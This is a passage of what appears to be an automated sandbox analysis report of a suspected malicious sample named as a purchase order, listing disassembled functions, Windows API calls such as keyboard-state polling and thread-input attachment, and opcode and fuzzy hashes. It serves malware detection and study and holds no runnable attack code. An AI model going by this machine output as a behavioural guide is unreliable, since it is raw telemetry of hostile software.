                                                            • DestroyWindow.USER32(00740069), ref: 00470A4C
                                                            • DestroyIcon.USER32(?), ref: 00470A73
                                                            • DestroyIcon.USER32(?), ref: 00470A81
                                                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1237572874-0
                                                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                            Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                            • VariantInit.OLEAUT32(?), ref: 004793E1
                                                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                            • VariantClear.OLEAUT32(?), ref: 00479489
                                                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                            • VariantClear.OLEAUT32(?), ref: 004794CA
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                            • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                            Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044480E
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                            • GetKeyState.USER32(000000A0), ref: 004448AA
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                            • GetKeyState.USER32(000000A1), ref: 004448D9
                                                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                            • GetKeyState.USER32(00000011), ref: 00444903
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                            • GetKeyState.USER32(00000012), ref: 0044492D
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                            • GetKeyState.USER32(0000005B), ref: 00444958
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                            Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                            • String ID:
                                                            • API String ID: 3413494760-0
                                                            • Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                            • Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                            Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                            • String ID: AU3_FreeVar
                                                            • API String ID: 2634073740-771828931
                                                            • Opcode ID: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                            • Opcode Fuzzy Hash: 02bdb148293147b792730c67b1546b00a60a675fa046de8965836ce0cfc2e6fd
                                                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                            Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32 ref: 0046C63A
                                                            • CoUninitialize.OLE32 ref: 0046C645
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                            • IIDFromString.OLE32(?,?), ref: 0046C705
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 2294789929-1287834457
                                                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                            Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                            • ReleaseCapture.USER32 ref: 0047116F
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 2483343779-2107944366
                                                            • Opcode ID: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                            • Opcode Fuzzy Hash: 37b0ef4ead8948c8a0d7f11259567122c9bd2b7a701ccd80914a9ed7fb95c3bd
                                                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                            Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                            • _wcslen.LIBCMT ref: 00450720
                                                            • _wcscat.LIBCMT ref: 00450733
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                            • String ID: -----$SysListView32
                                                            • API String ID: 4008455318-3975388722
                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                            Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                            • GetParent.USER32 ref: 00469C98
                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                            • GetParent.USER32 ref: 00469CBC
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2360848162-1403004172
                                                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                            Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                            • String ID:
                                                            • API String ID: 262282135-0
                                                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                            Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                            Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                            • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                            • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                            • String ID:
                                                            • API String ID: 3771399671-0
                                                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                            Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
